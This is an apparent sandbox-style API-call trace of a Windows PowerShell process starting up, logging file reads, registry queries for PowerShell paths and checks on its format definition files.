	[0515.760] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.760] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.760] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.761] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.761] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.762] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.762] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.762] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.762] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.762] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.763] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.764] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.764] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.764] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.765] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.765] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.765] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.765] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.766] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.766] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.766] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.766] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.766] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.767] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.767] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.767] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.767] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.769] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.770] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.770] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.771] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.771] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.771] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.772] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.772] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0515.772] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x1b4, lpOverlapped=0x0) returned 1
	[0515.772] ReadFile (in: hFile=0x324, lpBuffer=0x2cc20e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2cc20e0*, lpNumberOfBytesRead=0x1ed028*=0x0, lpOverlapped=0x0) returned 1
	[0515.772] CloseHandle (hObject=0x324) returned 1
	[0515.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0515.773] SetErrorMode (uMode=0x1) returned 0x1
	[0515.773] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecfa0 | out: lpFileInformation=0x1ecfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0515.773] SetErrorMode (uMode=0x1) returned 0x1
	[0515.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1eccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0515.773] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed088 | out: phkResult=0x1ed088*=0x324) returned 0x0
	[0515.773] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed00c, lpData=0x0, lpcbData=0x1ed008*=0x0 | out: lpType=0x1ed00c*=0x1, lpData=0x0, lpcbData=0x1ed008*=0x56) returned 0x0
	[0515.773] CoTaskMemAlloc (cb=0x5a) returned 0x1b6e7630
	[0515.773] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecfdc, lpData=0x1b6e7630, lpcbData=0x1ecfd8*=0x56 | out: lpType=0x1ecfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecfd8*=0x56) returned 0x0
	[0515.773] CoTaskMemFree (pv=0x1b6e7630) 
	[0515.774] RegCloseKey (hKey=0x324) returned 0x0
	[0515.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1eccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0515.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0519.444] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0520.723] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0520.723] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0520.724] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0520.725] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0520.733] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0521.796] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0521.797] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0521.801] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0521.817] VirtualQuery (in: lpAddress=0x1ebd80, lpBuffer=0x1ecc40, dwLength=0x30 | out: lpBuffer=0x1ecc40*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0521.819] VirtualQuery (in: lpAddress=0x1ebd80, lpBuffer=0x1ecc40, dwLength=0x30 | out: lpBuffer=0x1ecc40*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0521.820] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0522.973] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0522.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0522.973] CoTaskMemFree (pv=0x1b6e48b0) 
	[0522.990] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed228 | out: phkResult=0x1ed228*=0x2dc) returned 0x0
	[0522.990] RegQueryValueExW (in: hKey=0x2dc, lpValueName="path", lpReserved=0x0, lpType=0x1ed23c, lpData=0x0, lpcbData=0x1ed238*=0x0 | out: lpType=0x1ed23c*=0x1, lpData=0x0, lpcbData=0x1ed238*=0x74) returned 0x0
	[0522.991] RegQueryValueExW (in: hKey=0x2dc, lpValueName="path", lpReserved=0x0, lpType=0x1ed1ac, lpData=0x0, lpcbData=0x1ed1a8*=0x0 | out: lpType=0x1ed1ac*=0x1, lpData=0x0, lpcbData=0x1ed1a8*=0x74) returned 0x0
	[0522.991] CoTaskMemAlloc (cb=0x78) returned 0x382160
	[0522.991] RegQueryValueExW (in: hKey=0x2dc, lpValueName="path", lpReserved=0x0, lpType=0x1ed17c, lpData=0x382160, lpcbData=0x1ed178*=0x74 | out: lpType=0x1ed17c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ed178*=0x74) returned 0x0
	[0522.991] CoTaskMemFree (pv=0x382160) 
	[0522.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0522.991] SetErrorMode (uMode=0x1) returned 0x1
	[0522.991] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0522.991] SetErrorMode (uMode=0x1) returned 0x1
	[0522.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0522.993] SetErrorMode (uMode=0x1) returned 0x1
	[0522.993] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0522.993] SetErrorMode (uMode=0x1) returned 0x1
	[0522.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0522.993] SetErrorMode (uMode=0x1) returned 0x1
	[0522.993] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0522.993] SetErrorMode (uMode=0x1) returned 0x1
	[0522.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0522.993] SetErrorMode (uMode=0x1) returned 0x1
	[0522.993] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0522.994] SetErrorMode (uMode=0x1) returned 0x1
	[0522.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0522.994] SetErrorMode (uMode=0x1) returned 0x1
	[0522.994] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0522.994] SetErrorMode (uMode=0x1) returned 0x1
	[0522.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0523.992] SetErrorMode (uMode=0x1) returned 0x1
	[0523.992] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0523.992] SetErrorMode (uMode=0x1) returned 0x1
	[0523.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0523.992] SetErrorMode (uMode=0x1) returned 0x1
	[0523.992] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0523.993] SetErrorMode (uMode=0x1) returned 0x1
	[0523.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0523.993] SetErrorMode (uMode=0x1) returned 0x1
